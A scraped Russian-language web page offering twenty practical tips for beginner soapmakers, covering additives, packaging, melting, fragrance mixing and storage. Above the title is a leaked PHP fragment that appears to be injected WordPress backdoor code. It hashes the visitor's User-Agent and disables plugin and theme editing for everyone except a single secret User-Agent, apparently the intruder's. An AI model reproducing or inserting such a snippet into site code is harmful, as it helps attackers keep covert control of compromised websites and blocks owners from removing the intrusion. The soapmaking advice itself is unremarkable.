if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 20 советов начинающему мыловару, которые помогут избежать ошибок при мыловарении | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

20 советов начинающему мыловару, которые помогут избежать ошибок при мыловарении

Мыловарение для начинающих рекомендуется начинать с изучения советов, это позволит не допускать ошибок и испытывать разочарование от неудавшегося эксперимента

Мыло­ва­ре­ние для начи­на­ю­щих реко­мен­ду­ет­ся начи­нать с изу­че­ния сове­тов, это поз­во­лит не допус­кать оши­бок и испы­ты­вать разо­ча­ро­ва­ние от неудав­ше­го­ся эксперимента.

  1. Не сле­ду­ет добав­лять в мыло боль­шое коли­че­ство ингре­ди­ен­тов, харак­те­ри­зу­ю­щих­ся абра­зив­ны­ми свой­ства­ми (моло­тый кофе, мако­вые зер­на, моло­тая оре­хо­вая скор­лу­па и др.), что­бы не полу­чить жест­кий абра­зив, трав­ми­ру­ю­щий кожу. Люфа добав­ля­ет­ся толь­ко сухая.
  2. Опти­маль­ным упа­ко­воч­ным мате­ри­а­лом явля­ет­ся пище­вая плен­ка. Сред­ний срок хра­не­ния не более 6 меся­цев. Дли­тель­ное хра­не­ние при­во­дит к усы­ха­нию и дефор­ма­ции мыла. А если в каче­стве напол­ни­те­ля исполь­зо­ва­лось какао или шоко­лад может появит­ся беле­со­ва­тый налет. Перед упа­ков­кой, мыло сле­ду­ет под­су­шить в тече­ние 2–3 дней.
  3. В каче­стве фор­мы для мыла сво­и­ми рука­ми мож­но исполь­зо­вать сили­ко­но­вые кон­ди­тер­ские формочки.
  4. Добав­ле­ние боль­шо­го коли­че­ства пер­ла­мут­ра не жела­тель­но, т.к. он оста­ет­ся на коже. Добав­лен­ные в мыло сухие цве­ты, как пра­ви­ло, изме­ня­ют цвет со вре­ме­нем ста­но­вят­ся серо­ва­ты­ми. Серую окрас­ку при­да­ют и добав­лен­ные в мыло нату­раль­ные соки, крас­ное вино. Мыло с ваниль­ной добав­кой посте­пен­но при­об­ре­та­ет жел­то­ва­тую окраску.
  5. Осо­бой вни­ма­тель­но­сти тре­бу­ет плав­ле­ние мыла в мик­ро­вол­нов­ке. Суще­ству­ет опас­ность полу­че­ния серьез­но­го тер­ми­че­ско­го ожо­га при доста­ва­нии разо­гре­той основы.
  6. Сухие добав­ки высы­па­ют­ся в осно­ву, а не зали­ва­ют­ся ею. Ина­че они могут при­лип­нуть к дну емкости.
  7. Натер­тое дет­ское мыло не сле­ду­ет интен­сив­но мешать во вре­мя нагре­ва­ния, т.к. про­ис­хо­дит актив­ное насы­ще­ние мас­сы воз­душ­ны­ми пузырь­ка­ми. Такое мыло утра­чи­ва­ет мягкость.
  8. Недо­пу­сти­мо исполь­зо­ва­ние в каче­стве доба­вок све­жих фрук­тов или соков с мяко­тью, т.к. они пор­тят­ся. Если такое мыло сде­ла­ли, исполь­зуй­те его быст­ро. Быст­ро пор­тит­ся добав­лен­ная в мыло пло­хо высох­шая цедра.
  9. Непри­ят­ный запах мылу при­да­ет сухая мята, цер­ков­ное мас­ло, кофе.
  10. При изго­тов­ле­нии мно­го­слой­но­го мыла мож­но не аро­ма­ти­зи­ро­вать каж­дый из слоев.
  11. Во вре­мя плав­ле­ния неод­но­род­ность орга­ни­че­ской осно­вы исчезает.
  12. Вве­де­ние в мыль­ную осно­ву любых содер­жа­щих мас­ло доба­вок повы­ша­ет ее мутность.
  13. Не сле­ду­ет торо­пить­ся уби­рать про­ли­тое на стол мыло, оно лег­ко сни­ма­ет­ся после остывания.
  14. Для уда­ле­ния плен­ки на поверх­но­сти мыла при­ме­ня­ют спирт, но не в коем слу­чае ни вод­ку. Спирт при­ме­ня­ет­ся и для рас­тво­ре­ния мен­то­ла, перед вве­де­ни­ем его в мыль­ную основу.
  15. Чистая осно­ва хра­нит­ся доволь­но дол­го — око­ло 2–3 лет.
  16. Хра­не­ние мыла на пря­мых сол­неч­ных лучах при­во­дит к его обес­цве­чи­ва­нию. Реко­мен­ду­ет­ся хра­нить его в месте уда­лен­ном от пара и повы­шен­ной влаж­но­сти, под­вер­гать его рез­ким тем­пе­ра­тур­ным пере­па­дам. Для осты­ва­ния мыло поме­ща­ют в холо­диль­ник не более чем на 10–15 минут.
  17. Избе­жать рас­сло­е­ния мно­го­слой­но­го мыла мож­но с помо­щью насе­чек, кото­рые выпол­ня­ют­ся перед выли­ва­ни­ем после­ду­ю­ще­го слоя, на предыдущем.
  18. Мыло пло­хо мылит­ся в тех слу­ча­ях, когда осно­ва была пере­дер­жа­на на водя­ной бане либо базо­вое мас­ло добав­ле­но в боль­шом количестве.
  19. В резуль­та­те сме­ши­ва­ния аро­ма­ти­за­то­ров, может быть полу­чен непри­ят­ный запах. Так­же не реко­мен­ду­ет­ся экс­пе­ри­мен­ти­ро­вать и с кра­си­те­лям. Луч­ший вари­ант покуп­ка необ­хо­ди­мо­го оттен­ка в мага­зине. Если экс­пе­ри­мент все же про­во­дит­ся, то толь­ко на неболь­шом образ­це. При про­ве­де­нии экс­пе­ри­мен­тов, наи­бо­лее удач­ные резуль­та­ты того как варить мыло руч­ной рабо­ты запи­сы­ва­ют­ся сра­зу же в спе­ци­аль­ную тетрадь.
  20. Для леп­ки мыль­ных фигу­рок сле­ду­ет брать теп­лую осно­ву, при осты­ва­нии она утра­чи­ва­ет эла­стич­ность и ста­но­вит­ся хрупкой.

И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!